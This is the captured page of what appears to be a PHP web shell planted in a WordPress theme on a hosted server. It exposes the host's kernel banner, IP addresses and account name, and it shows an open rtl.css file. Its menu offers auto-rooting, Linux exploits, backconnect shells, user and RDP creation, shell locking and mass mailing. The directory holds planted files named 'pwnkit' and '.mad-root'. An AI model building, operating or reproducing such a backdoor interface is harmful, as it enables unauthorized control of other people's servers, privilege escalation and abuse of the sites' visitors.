Linux webm003.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.131.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
7.4.33
anoukpx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
anoukpx /
www /
wp-content /
themes /
always /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
2.54
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
comments.php
1.87
KB
-rw-r--r--
footer.php
1.32
KB
-rw-r--r--
functions.php
10.22
KB
-rw-r--r--
header.php
1.11
KB
-rw-r--r--
index.php
5.74
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
2.67
KB
-rw-r--r--
rtl.css
1.97
KB
-rw-r--r--
screenshot.png
234.71
KB
-rw-r--r--
singular.php
2.23
KB
-rw-r--r--
style.css
110.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rtl.css
/* Theme Name: Always Adding support for languages written in a Right To Left (RTL) direction is easy - it's just a matter of overwriting all the horizontal positioning attributes of your CSS stylesheet in a separate stylesheet file named rtl.css. https://codex.wordpress.org/Right-to-Left_Language_Support */ .header-searchbar #search-closer { right: inherit; left: 10px; } .search-form label, .search-form .search-submit { float: right; } .site-navigation .primary-menu > li.menu-item-has-children > a { padding-right: 0; padding-left: 2rem; } .widget_recent_entries ul li a, .widget_categories ul li a, .widget_pages ul li a, .widget_archive ul li a, .widget_meta ul li a { margin-right: 0; } .floating-navigation-prev { left: calc(100% - 50px); right: inherit; } .floating-navigation-prev:hover { left: calc(100% - 339px); right: inherit; } .floating-navigation-next { right: calc(100% - 50px); left: inherit; } .floating-navigation-next:hover { right: calc(100% - 339px); left: inherit; } .floating-navigation-prev img { left: 50px; right: inherit; } .floating-navigation-next img { right: 50px; left: inherit; } .floating-navigation-next .floating-navigation-label { right: 0; left: auto; } .floating-navigation-prev .floating-navigation-label { right: auto; left: 0; } .floating-post-navigation .floating-navigation-title { left: 50%; right: inherit; transform: translate(-50%, -50%); padding: 20px 60px 20px 20px; } .floating-navigation-prev .floating-navigation-title { padding: 20px 20px 20px 60px; } .post-navigation .nav-links .arrow { -webkit-transform: scaleX(-1); transform: scaleX(-1); } .theme-panelarea-blocks .theme-panel-blocks { float: right; } .theme-block-categories .theme-block-link{ right: inherit; left: 2rem; } .theme-block-link .theme-button span .svg-icon, .theme-button-primary span .svg-icon{ -webkit-transform: scaleX(-1); transform: scaleX(-1); }
Close